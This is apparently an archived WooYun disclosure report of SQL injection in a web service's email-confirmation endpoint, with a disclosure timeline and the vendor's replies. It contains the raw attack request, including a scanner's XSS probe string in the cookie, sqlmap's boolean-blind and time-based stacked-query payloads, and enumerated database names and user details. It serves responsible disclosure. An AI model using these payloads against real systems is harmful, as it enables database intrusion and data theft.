乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-26: 细节已通知厂商并且等待厂商处理中 2015-10-26: 厂商已经确认,细节仅向厂商公开 2015-11-05: 细节向核心白帽子及相关领域专家公开 2015-11-15: 细节向普通白帽子公开 2015-11-23: 厂商已经修复漏洞并主动公开,细节向公众公开
RT
网站多处存在注入,选取其中一个
POST /User/confirmemail/ HTTP/1.1Content-Length: 72Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://buzz.hiiir.com/Cookie: PHPSESSID=1220aae1u89t98vsfkr74fe9q3; _Timer=2; __utmt=1; __utma=112679063.348446717.1445834033.1445834033.1445834033.1; __utmb=112679063.2.10.1445834033; __utmc=112679063; __utmz=112679063.1445834033.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); __atuvc=1%7C43; __atuvs=562dacff6159b6b8000Host: buzz.hiiir.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*email=sample%40email.tst*
sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* ((custom) POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: [email protected]') AND 2209=2209 AND ('PhnV'='PhnV Type: stacked queries Title: MySQL > 5.0.11 stacked queries (SELECT - comment) Payload: [email protected]');(SELECT * FROM (SELECT(SLEEP(5)))QoeX)#---web application technology: PHP 5.2.10back-end DBMS: MySQL 5.0.11available databases [8]:[*] Hiiir_Rss[*] Hiiir_Statistics[*] HiiirAdPower[*] HiiirHero[*] HiiirLog[*] HiiirRepl[*] HiiirTrack[*] information_schema
sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* ((custom) POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: [email protected]') AND 2209=2209 AND ('PhnV'='PhnV Type: stacked queries Title: MySQL > 5.0.11 stacked queries (SELECT - comment) Payload: [email protected]');(SELECT * FROM (SELECT(SLEEP(5)))QoeX)#---web application technology: PHP 5.2.10back-end DBMS: MySQL 5.0.11current user: 'ITothere@%'current database: 'HiiirRepl'current user is DBA: False
整体修复下吧,挺多的
危害等级:高
漏洞Rank:15
确认时间:2015-10-26 18:17
此網站屬於公司早期服務,後續已經沒有再持續維護,但是我們仍然感謝您的回報,我們會儘快處理
2015-11-23:部分服務為公司早期服務且未來將暫停維運,目前已完成下線作業,再次感謝漏洞回報,以後將會持續加強內部管理流程